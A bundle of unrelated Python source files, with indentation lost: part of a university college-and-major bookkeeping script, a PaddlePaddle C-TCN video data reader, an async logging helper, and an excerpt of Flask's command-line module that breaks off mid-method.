'环境工程', 'status': 0}, {'major': '高分子材料与工程', 'status': 0}, {'major': '材料科学与工程', 'status': 0}, {'major': '材料化学', 'status': 0}, {'major': '功能材料', 'status': 0}, {'major': '化学', 'status': 0}], '艺术学院': [{'major': '艺术设计学', 'status': 0}, {'major': '视觉传达设计', 'status': 0}, {'major': '服装与服饰设计', 'status': 0}, {'major': '环境设计', 'status': 0}, {'major': '美术学(师范)', 'status': 0}, {'major': '产品设计', 'status': 0}, {'major': '数字媒体艺术', 'status': 0}, {'major': '服装与服饰设计(时装表演与服装设计)', 'status': 0}, {'major': '美术学', 'status': 0}], '王健法学院': [{'major': '知识产权', 'status': 0}, {'major': '法学', 'status': 0}], '机电工程学院': [{'major': '机械电子工程', 'status': 0}, {'major': '工业工程', 'status': 0}, {'major': '电气工程及其自动化', 'status': 0}, {'major': '材料成型及控制工程', 'status': 0}, {'major': '机械工程', 'status': 0}], '纺织与服装工程学院': [{'major': '服装设计与工程', 'status': 0}, {'major': '纺织工程', 'status': 0}, {'major': '纺织工程(中外合作办学项目)', 'status': 0}, {'major': '非织造材料与工程', 'status': 0}, {'major': '轻化工程', 'status': 0}], '物理与光电·能源学部': [{'major': '物理学(师范)', 'status': 0}, {'major': '物理学', 'status': 0}, {'major': '光电信息科学与工程', 'status': 0}, {'major': '电子信息科学与技术', 'status': 0}, {'major': '新能源材料与器件', 'status': 0}, {'major': '能源与动力工程', 'status': 0}, {'major': '测控技术与仪器', 'status': 0}], '教育学院': [{'major': '应用心理学', 'status': 0}, {'major': '教育学(师范)', 'status': 0}, {'major': '教育技术学(师范)', 'status': 0}], '轨道交通学院': [{'major': '车辆工程', 'status': 0}, {'major': '电气工程与智能控制', 'status': 0}, {'major': '工程管理', 'status': 0}, {'major': '建筑环境与能源应用工程', 'status': 0}, {'major': '通信工程(城市轨道交通通信信号)', 'status': 0}, {'major': '交通运输', 'status': 0}], '数学科学学院': [{'major': '金融数学', 'status': 0}, {'major': '信息与计算科学', 'status': 0}, {'major': '数学与应用数学(基地)', 'status': 0}, {'major': '统计学', 'status': 0}, {'major': '数学与应用数学(师范)', 'status': 0}], '政治与公共管理学院': [{'major': '物流管理(中外合作办学项目)', 'status': 0}, {'major': '城市管理', 'status': 0}, {'major': '物流管理', 'status': 0}, {'major': '行政管理', 'status': 0}, {'major': '思想政治教育', 'status': 0}, {'major': '人力资源管理', 'status': 0}, {'major': '哲学', 'status': 0}, {'major': '管理科学', 'status': 0}, {'major': '公共事业管理', 'status': 0}], '传媒学院': [{'major': '广告学', 'status': 0}, {'major': '新闻学', 'status': 0}, {'major': '广播电视学', 'status': 0}, {'major': '播音与主持艺术', 'status': 0}], '医学部': [{'major': '食品质量与安全', 'status': 0}, {'major': '生物信息学', 'status': 0}, {'major': '法医学', 'status': 0}, {'major': '护理学', 'status': 0}, {'major': '生物科学', 'status': 0}, {'major': '医学影像学', 'status': 0}, {'major': '药学', 'status': 0}, {'major': '预防医学', 'status': 0}, {'major': '口腔医学', 'status': 0}, {'major': '生物技术', 'status': 0}, {'major': '中药学', 'status': 0}, {'major': '医学检验技术', 'status': 0}, {'major': '生物制药', 'status': 0}, {'major': '临床医学', 'status': 0}, {'major': '放射医学', 'status': 0}], '金螳螂建筑学院': [{'major': '城乡规划', 'status': 0}, {'major': '建筑学(室内设计)', 'status': 0}, {'major': '园艺', 'status': 0}, {'major': '风景园林', 'status': 0}, {'major': '建筑学', 'status': 0}], '电子信息学院': [{'major': '电子科学与技术', 'status': 0}, {'major': '信息工程', 'status': 0}, {'major': '通信工程', 'status': 0}, {'major': '电子信息工程', 'status': 0}, {'major': '微电子科学与工程', 'status': 0}, {'major': '通信工程(嵌入式软件人才培养)', 'status': 0}], '音乐学院': [{'major': '音乐表演', 'status': 0}, {'major': '音乐学(师范)', 'status': 0}], '东吴商学院(财经学院)': [{'major': '市场营销', 'status': 0}, {'major': '金融学(中外合作办学项目)', 'status': 0}, {'major': '会计学', 'status': 0}, {'major': '财政学', 'status': 0}, {'major': '工商管理', 'status': 0}, {'major': '财务管理', 'status': 0}, {'major': '国际经济与贸易', 'status': 0}, {'major': '金融学', 'status': 0}, {'major': '经济学', 'status': 0}, {'major': '电子商务', 'status': 0}]}
print(len(dirlist))
delete_key_list=[]
for dirobj in dirlist:
completeCount=0
majorCount=len(dirlist[dirobj])
for major in dirlist[dirobj]:
if major['status']==1:
completeCount+=1
if completeCount==majorCount:
delete_key_list.append(dirobj)
print(delete_key_list)
for deleteitem in delete_key_list:
dirlist.pop(deleteitem)
print(dirlist)
print(len(dirlist))
if __name__ == "__main__":
college_batch_generate(type=2)
#mapperObj=majorcollege2dict(college_major_mapping_path)
#major_generate('播音与主持艺术',mapperObj,'文学院')
#testdeletelist()
|
ctcn_reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import os
import random
import cv2
import sys
import numpy as np
import gc
import copy
import multiprocessing
import logging
logger = logging.getLogger(__name__)
try:
import cPickle as pickle
from cStringIO import StringIO
except ImportError:
import pickle
from io import BytesIO
from .reader_utils import DataReader
from models.ctcn.ctcn_utils import box_clamp1D, box_iou1D, BoxCoder
python_ver = sys.version_info
#random.seed(0)
#np.random.seed(0)
class CTCNReader(DataReader):
"""
Data reader for C-TCN model, which was stored as features extracted by prior networks
dataset cfg: img_size, the temporal dimension size of input data
root, the root dir of data
snippet_length, snippet length when sampling
filelist, the file list storing id and annotations of each data item
rgb, the dir of rgb data
flow, the dir of optical flow data
batch_size, batch size of input data
num_threads, number of threads of data processing
"""
def __init__(self, name, mode, cfg):
self.name = name
self.mode = mode
self.img_size = cfg.MODEL.img_size # 512
self.snippet_length = cfg.MODEL.snippet_length # 1
self.root = cfg.MODEL.root # root dir of data
self.filelist = cfg[mode.upper()]['filelist']
self.rgb = cfg[mode.upper()]['rgb']
self.flow = cfg[mode.upper()]['flow']
self.batch_size = cfg[mode.upper()]['batch_size']
self.num_threads = cfg[mode.upper()]['num_threads']
if (mode == 'test') or (mode == 'infer'):
self.num_threads = 1 # set num_threads as 1 for test and infer
def random_move(self, img, o_boxes, labels):
boxes = np.array(o_boxes)
mask = np.zeros(img.shape[0])
for i in boxes:
for j in range(i[0].astype('int'),
min(i[1].astype('int'), img.shape[0])):
mask[j] = 1
mask = (mask == 0)
bg = img[mask]
bg_len = bg.shape[0]
if bg_len < 5:
return img, boxes, labels
insert_place = random.sample(range(bg_len), len(boxes))
index = np.argsort(insert_place)
new_img = bg[0:insert_place[index[0]], :]
new_boxes = []
new_labels = []
for i in range(boxes.shape[0]):
new_boxes.append([
new_img.shape[0],
new_img.shape[0] + boxes[index[i]][1] - boxes[index[i]][0]
])
new_labels.append(labels[index[i]])
new_img = np.concatenate(
(new_img,
img[int(boxes[index[i]][0]):int(boxes[index[i]][1]), :]))
if i < boxes.shape[0] - 1:
new_img = np.concatenate(
(new_img,
bg[insert_place[index[i]]:insert_place[index[i + 1]], :]))
new_img = np.concatenate(
(new_img, bg[insert_place[index[len(boxes) - 1]]:, :]))
del img, boxes, mask, bg, labels
gc.collect()
return new_img, new_boxes, new_labels
def random_crop(self, img, boxes, labels, min_scale=0.3):
boxes = np.array(boxes)
labels = np.array(labels)
imh, imw = img.shape[:2]
params = [(0, imh)]
for min_iou in (0, 0.1, 0.3, 0.5, 0.7, 0.9):
for _ in range(100):
scale = random.uniform(0.3, 1)
h = int(imh * scale)
y = random.randrange(imh - h)
roi = [[y, y + h]]
ious = box_iou1D(boxes, roi)
if ious.min() >= min_iou:
params.append((y, h))
break
y, h = random.choice(params)
img = img[y:y + h, :]
center = (boxes[:, 0] + boxes[:, 1]) / 2
mask = (center[:] >= y) & (center[:] <= y + h)
if mask.any():
boxes = boxes[np.squeeze(mask.nonzero())] - np.array([[y, y]])
boxes = box_clamp1D(boxes, 0, h)
labels = labels[mask]
else:
boxes = [[0, 0]]
labels = [0]
return img, boxes, labels
def resize(self, img, boxes, size, random_interpolation=False):
'''Resize the input PIL image to given size.
If boxes is not None, resize boxes accordingly.
Args:
img: image to be resized.
boxes: (tensor) object boxes, sized [#obj,2].
size: (tuple or int)
- if is tuple, resize image to the size.
- if is int, resize the shorter side to the size while maintaining the aspect ratio.
random_interpolation: (bool) randomly choose a resize interpolation method.
Returns:
img: (cv2's numpy.ndarray) resized image.
boxes: (tensor) resized boxes.
Example:
>> img, boxes = resize(img, boxes, 600) # resize shorter side to 600
'''
h, w = img.shape[:2]
if h == size:
return img, boxes
if h == 0:
img = np.zeros((512, 402), np.float32)
return img, boxes
ow = w
oh = size
sw = 1
sh = float(oh) / h
method = random.choice([
cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA
]) if random_interpolation else cv2.INTER_NEAREST
img = cv2.resize(img, (ow, oh), interpolation=method)
if boxes is not None:
boxes = boxes * np.array([sh, sh])
return img, boxes
def transform(self, feats, boxes, labels, mode):
feats = np.array(feats)
boxes = np.array(boxes)
labels = np.array(labels)
#print('name {}, labels {}'.format(fname, labels))
if mode == 'train':
feats, boxes, labels = self.random_move(feats, boxes, labels)
feats, boxes, labels = self.random_crop(feats, boxes, labels)
feats, boxes = self.resize(
feats, boxes, size=self.img_size, random_interpolation=True)
h, w = feats.shape[:2]
img = feats.reshape(1, h, w)
Coder = BoxCoder()
boxes, labels = Coder.encode(boxes, labels)
if mode == 'test' or mode == 'valid':
feats, boxes = self.resize(feats, boxes, size=self.img_size)
h, w = feats.shape[:2]
img = feats.reshape(1, h, w)
Coder = BoxCoder()
boxes, labels = Coder.encode(boxes, labels)
return img, boxes, labels
def load_file(self, fname):
if python_ver < (3, 0):
rgb_pkl = pickle.load(
open(os.path.join(self.root, self.rgb, fname + '.pkl')))
flow_pkl = pickle.load(
open(os.path.join(self.root, self.flow, fname + '.pkl')))
else:
rgb_pkl = pickle.load(
open(os.path.join(self.root, self.rgb, fname + '.pkl')),
encoding='bytes')
flow_pkl = pickle.load(
open(os.path.join(self.root, self.flow, fname + '.pkl')),
encoding='bytes')
data_flow = np.array(flow_pkl['scores'])
data_rgb = np.array(rgb_pkl['scores'])
if data_flow.shape[0] < data_rgb.shape[0]:
data_rgb = data_rgb[0:data_flow.shape[0], :]
elif data_flow.shape[0] > data_rgb.shape[0]:
data_flow = data_flow[0:data_rgb.shape[0], :]
feats = np.concatenate((data_rgb, data_flow), axis=1)
if feats.shape[0] == 0 or feats.shape[1] == 0:
feats = np.zeros((512, 1024), np.float32)
logger.info('### file loading len = 0 {} ###'.format(fname))
return feats
def create_reader(self):
"""reader creator for ctcn model"""
if self.mode == 'infer':
return self.make_infer_reader()
if self.num_threads == 1:
return self.make_reader()
else:
return self.make_multiprocess_reader()
def make_infer_reader(self):
"""reader for inference"""
def reader():
with open(self.filelist) as f:
reader_list = f.readlines()
batch_out = []
for line in reader_list:
fname = line.strip().split()[0]
rgb_exist = os.path.exists(
os.path.join(self.root, self.rgb, fname + '.pkl'))
flow_exist = os.path.exists(
os.path.join(self.root, self.flow, fname + '.pkl'))
if not (rgb_exist and flow_exist):
logger.info('file not exist', fname)
continue
try:
feats = self.load_file(fname)
feats, boxes = self.resize(
feats, boxes=None, size=self.img_size)
h, w = feats.shape[:2]
feats = feats.reshape(1, h, w)
except:
logger.info('Error when loading {}'.format(fname))
continue
batch_out.append((feats, fname))
if len(batch_out) == self.batch_size:
yield batch_out
batch_out = []
return reader
def make_reader(self):
"""single process reader"""
def reader():
with open(self.filelist) as f:
reader_list = f.readlines()
if self.mode == 'train':
random.shuffle(reader_list)
fnames = []
total_boxes = []
total_labels = []
total_label_ids = []
for i in range(len(reader_list)):
line = reader_list[i]
splited = line.strip().split()
rgb_exist = os.path.exists(
os.path.join(self.root, self.rgb, splited[0] + '.pkl'))
flow_exist = os.path.exists(
os.path.join(self.root, self.flow, splited[0] + '.pkl'))
if not (rgb_exist and flow_exist):
# logger.info('file not exist', splited[0])
continue
fnames.append(splited[0])
frames_num = int(splited[1]) // self.snippet_length
num_boxes = int(splited[2])
box = []
label = []
for ii in range(num_boxes):
c = splited[3 + 3 * ii]
xmin = splited[4 + 3 * ii]
xmax = splited[5 + 3 * ii]
box.append([
float(xmin) / self.snippet_length,
float(xmax) / self.snippet_length
])
label.append(int(c))
total_label_ids.append(i)
total_boxes.append(box)
total_labels.append(label)
num_videos = len(fnames)
batch_out = []
for idx in range(num_videos):
fname = fnames[idx]
try:
feats = self.load_file(fname)
boxes = copy.deepcopy(total_boxes[idx])
labels = copy.deepcopy(total_labels[idx])
feats, boxes, labels = self.transform(feats, boxes, labels,
self.mode)
labels = labels.astype('int64')
boxes = boxes.astype('float32')
num_pos = len(np.where(labels > 0)[0])
except:
logger.info('Error when loading {}'.format(fname))
continue
if (num_pos < 1) and (self.mode == 'train' or
self.mode == 'valid'):
#logger.info('=== no pos for ==='.format(fname, num_pos))
continue
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((feats, boxes, labels))
elif self.mode == 'test':
batch_out.append(
(feats, boxes, labels, total_label_ids[idx]))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
yield batch_out
batch_out = []
return reader
def make_multiprocess_reader(self):
"""multiprocess reader"""
def read_into_queue(reader_list, queue):
fnames = []
total_boxes = []
total_labels = []
total_label_ids = []
#for line in reader_list:
for i in range(len(reader_list)):
line = reader_list[i]
splited = line.strip().split()
rgb_exist = os.path.exists(
os.path.join(self.root, self.rgb, splited[0] + '.pkl'))
flow_exist = os.path.exists(
os.path.join(self.root, self.flow, splited[0] + '.pkl'))
if not (rgb_exist and flow_exist):
# logger.info('file not exist {}'.format(splited[0]))
continue
fnames.append(splited[0])
frames_num = int(splited[1]) // self.snippet_length
num_boxes = int(splited[2])
box = []
label = []
for ii in range(num_boxes):
c = splited[3 + 3 * ii]
xmin = splited[4 + 3 * ii]
xmax = splited[5 + 3 * ii]
box.append([
float(xmin) / self.snippet_length,
float(xmax) / self.snippet_length
])
label.append(int(c))
total_label_ids.append(i)
total_boxes.append(box)
total_labels.append(label)
num_videos = len(fnames)
batch_out = []
for idx in range(num_videos):
fname = fnames[idx]
try:
feats = self.load_file(fname)
boxes = copy.deepcopy(total_boxes[idx])
labels = copy.deepcopy(total_labels[idx])
feats, boxes, labels = self.transform(feats, boxes, labels,
self.mode)
labels = labels.astype('int64')
boxes = boxes.astype('float32')
num_pos = len(np.where(labels > 0)[0])
except:
logger.info('Error when loading {}'.format(fname))
continue
if (not (num_pos >= 1)) and (self.mode == 'train' or
self.mode == 'valid'):
#logger.info('=== no pos for {}, num_pos = {} ==='.format(fname, num_pos))
continue
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((feats, boxes, labels))
elif self.mode == 'test':
batch_out.append(
(feats, boxes, labels, total_label_ids[idx]))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
queue.put(batch_out)
batch_out = []
queue.put(None)
def queue_reader():
with open(self.filelist) as f:
fl = f.readlines()
if self.mode == 'train':
random.shuffle(fl)
n = self.num_threads
queue_size = 20
reader_lists = [None] * n
file_num = int(len(fl) // n)
for i in range(n):
if i < len(reader_lists) - 1:
tmp_list = fl[i * file_num:(i + 1) * file_num]
else:
tmp_list = fl[i * file_num:]
reader_lists[i] = tmp_list
queue = multiprocessing.Queue(queue_size)
p_list = [None] * len(reader_lists)
# for reader_list in reader_lists:
for i in range(len(reader_lists)):
reader_list = reader_lists[i]
p_list[i] = multiprocessing.Process(
target=read_into_queue, args=(reader_list, queue))
p_list[i].start()
reader_num = len(reader_lists)
finish_num = 0
while finish_num < reader_num:
sample = queue.get()
if sample is None:
finish_num += 1
else:
yield sample
for i in range(len(p_list)):
if p_list[i].is_alive():
p_list[i].join()
return queue_reader
|
logging.py
|
"""Logging utilities."""
import asyncio
import logging
import threading
from .async import run_coroutine_threadsafe
class HideSensitiveDataFilter(logging.Filter):
"""Filter API password calls."""
def __init__(self, text):
"""Initialize sensitive data filter."""
super().__init__()
self.text = text
def filter(self, record):
"""Hide sensitive data in messages."""
record.msg = record.msg.replace(self.text, '*******')
return True
# pylint: disable=invalid-name
class AsyncHandler(object):
"""Logging handler wrapper to add a async layer."""
def __init__(self, loop, handler):
"""Initialize async logging handler wrapper."""
self.handler = handler
self.loop = loop
self._queue = asyncio.Queue(loop=loop)
self._thread = threading.Thread(target=self._process)
# Delegate from handler
self.setLevel = handler.setLevel
self.setFormatter = handler.setFormatter
self.addFilter = handler.addFilter
self.removeFilter = handler.removeFilter
self.filter = handler.filter
self.flush = handler.flush
self.handle = handler.handle
self.handleError = handler.handleError
self.format = handler.format
self._thread.start()
def close(self):
"""Wrap close to handler."""
self.emit(None)
@asyncio.coroutine
def async_close(self, blocking=False):
"""Close the handler.
When blocking=True, will wait till closed.
"""
if not self._thread.is_alive():
return
yield from self._queue.put(None)
if blocking:
# Python 3.4.4+
# pylint: disable=no-member
if hasattr(self._queue, 'join'):
yield from self._queue.join()
else:
while not self._queue.empty():
yield from asyncio.sleep(0, loop=self.loop)
def emit(self, record):
"""Process a record."""
ident = self.loop.__dict__.get("_thread_ident")
# inside eventloop
if ident is not None and ident == threading.get_ident():
self._queue.put_nowait(record)
# from a thread/executor
else:
self.loop.call_soon_threadsafe(self._queue.put_nowait, record)
def __repr__(self):
"""String name of this."""
return str(self.handler)
def _process(self):
"""Process log in a thread."""
support_join = hasattr(self._queue, 'task_done')
while True:
record = run_coroutine_threadsafe(
self._queue.get(), self.loop).result()
# pylint: disable=no-member
if record is None:
self.handler.close()
if support_join:
self.loop.call_soon_threadsafe(self._queue.task_done)
return
self.handler.emit(record)
if support_join:
self.loop.call_soon_threadsafe(self._queue.task_done)
def createLock(self):
"""Ignore lock stuff."""
pass
def acquire(self):
"""Ignore lock stuff."""
pass
def release(self):
"""Ignore lock stuff."""
pass
@property
def level(self):
"""Wrap property level to handler."""
return self.handler.level
@property
def formatter(self):
"""Wrap property formatter to handler."""
return self.handler.formatter
@property
def name(self):
"""Wrap property set_name to handler."""
return self.handler.get_name()
@name.setter
def set_name(self, name):
"""Wrap property get_name to handler."""
self.handler.name = name
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: © 2010 by the Pallets team.
:license: BSD, see LICENSE for more details.
"""
from __future__ import print_function
import ast
import inspect
import os
import re
import ssl
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock, Thread
import click
from werkzeug.utils import import_string
from . import __version__
from ._compat import getargspec, itervalues, reraise, text_type
from .globals import current_app
from .helpers import get_debug_flag, get_env, get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(script_info, module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ('app', 'application'):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [
v for v in itervalues(module.__dict__) if isinstance(v, Flask)
]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
'Detected multiple Flask applications in module "{module}". Use '
'"FLASK_APP={module}:name" to specify the correct '
'one.'.format(module=module.__name__)
)
# Search for app factory functions.
for attr_name in ('create_app', 'make_app'):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = call_factory(script_info, app_factory)
if isinstance(app, Flask):
return app
except TypeError:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
'Detected factory "{factory}" in module "{module}", but '
'could not call it without arguments. Use '
'"FLASK_APP=\'{module}:{factory}(args)\'" to specify '
'arguments.'.format(
factory=attr_name, module=module.__name__
)
)
raise NoAppException(
'Failed to find Flask application or factory in module "{module}". '
'Use "FLASK_APP={module}:name to specify one.'.format(
module=module.__name__
)
)
def call_factory(script_info, app_factory, arguments=()):
"""Takes an app factory, a ``script_info` object and optionally a tuple
of arguments. Checks for the existence of a script_info argument and calls
the app_factory depending on that and the arguments provided.
"""
args_spec = getargspec(app_factory)
arg_names = args_spec.args
arg_defaults = args_spec.defaults
if 'script_info' in arg_names:
return app_factory(*arguments, script_info=script_info)
elif arguments:
return app_factory(*arguments)
elif not arguments and len(arg_names) == 1 and arg_defaults is None:
return app_factory(script_info)
return app_factory()
def _called_with_wrong_args(factory):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param factory: the factory function that was called
:return: true if the call failed
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is factory.__code__:
# in the factory, it was called successfully
return False
tb = tb.tb_next
# didn't reach the factory
return True
finally:
del tb
def find_app_by_string(script_info, module, app_name):
"""Checks if the given string is a variable name or a function. If it is a
function, it checks for specified arguments and whether it takes a
``script_info`` argument and calls the function with the appropriate
arguments.
"""
from flask import Flask
match = re.match(r'^ *([^ ()]+) *(?:\((.*?) *,? *\))? *$', app_name)
if not match:
raise NoAppException(
'"{name}" is not a valid variable name or function '
'expression.'.format(name=app_name)
)
name, args = match.groups()
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(e.args[0])
if inspect.isfunction(attr):
if args:
try:
args = ast.literal_eval('({args},)'.format(args=args))
except (ValueError, SyntaxError)as e:
raise NoAppException(
'Could not parse the arguments in '
'"{app_name}".'.format(e=e, app_name=app_name)
)
else:
args = ()
try:
app = call_factory(script_info, attr, args)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
'{e}\nThe factory "{app_name}" in module "{module}" could not '
'be called with the specified arguments.'.format(
e=e, app_name=app_name, module=module.__name__
)
)
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
'A valid Flask application was not obtained from '
'"{module}:{app_name}".'.format(
module=module.__name__, app_name=app_name
)
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == '.py':
path = fname
if os.path.basename(path) == '__init__':
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, '__init__.py')):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return '.'.join(module_name[::-1])
def locate_app(script_info, module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True
try:
__import__(module_name)
except ImportError:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[-1].tb_next:
raise NoAppException(
'While importing "{name}", an ImportError was raised:'
'\n\n{tb}'.format(name=module_name, tb=traceback.format_exc())
)
elif raise_if_not_found:
raise NoAppException(
'Could not import "{name}".'.format(name=module_name)
)
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(script_info, module)
else:
return find_app_by_string(script_info, module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
message = 'Flask %(version)s\nPython %(python_version)s'
click.echo(message % {
'version': __version__,
'python_version': sys.version,
}, color=ctx.color)
ctx.exit()
version_option = click.Option(
['--version'],
help='Show the flask version',
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True
)
class DispatchingApp(object):
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=False):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc_info = None
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True
with self._lock:
try:
self._load_unlocked()
except Exception:
self._bg_loading_exc_info = sys.exc_info()
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True
exc_info = self._bg_loading_exc_info
if exc_info is not None:
self._bg_loading_exc_info = None
reraise(*exc_info)
def _load_unlocked(self):
__traceback_hide__ = True
self._app = rv = self.loader()
self._bg_loading_exc_info = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo(object):
"""Help object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None,
set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get('FLASK_APP')
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True
if self._loaded_app is not None:
return self._loaded_app
app = None
if self.create_app is not None:
app = call_factory(self, self.create_app)
else:
if self.app_import_path:
path, name = (self.app_import_path.split(':', 1) + [None])[:2]
import_name = prepare_import(path)
app = locate_app(self, import_name, name)
else:
for path in ('wsgi.py', 'app.py'):
import_name = prepare_import(path)
app = locate_app(self, import_name, None,
raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
'Could not locate a Flask application. You did not provide '
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop('with_appcontext', True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault('cls', AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this.
For information as of why this is useful see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands wil be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(self, add_default_commands=True, create_app=None,
add_version_option=True, load_dotenv=True,
set_debug_flag=True, **extra):
params = list(extra.pop('params', None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points('flask.commands'):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# We load built-in commands first as these should always be the
# same no matter what the app does. If the app does want to
# override this it needs to make a custom instance of this group
# and not attach the default commands.
#
# This also means that the script stays functional in case the
# application completely fails.
rv = AppGroup.get_command(self, ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
try:
rv = info.load_app().cli.get_command(ctx, name)
if rv is not None:
return rv
except NoAppException:
pass
def list_commands(self, ctx):
self._load_plugin_commands()
# The commands available is the list of both the application (if
# available) plus the builtin commands.
rv = set(click.Group.list_commands(self, ctx))
info = ctx.ensure_object(ScriptInfo)
try:
rv.update(info.load_app().cli.list_commands(ctx))
except Exception:
# Here we intentionally swallow all exceptions as we don't
# want the help page to break if the app does not exist.
# If someone attempts to use the command we try to create
# the app again and this will give us the error.
# However, we will not do so silently because that would confuse
# users.
traceback.print_exc()
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
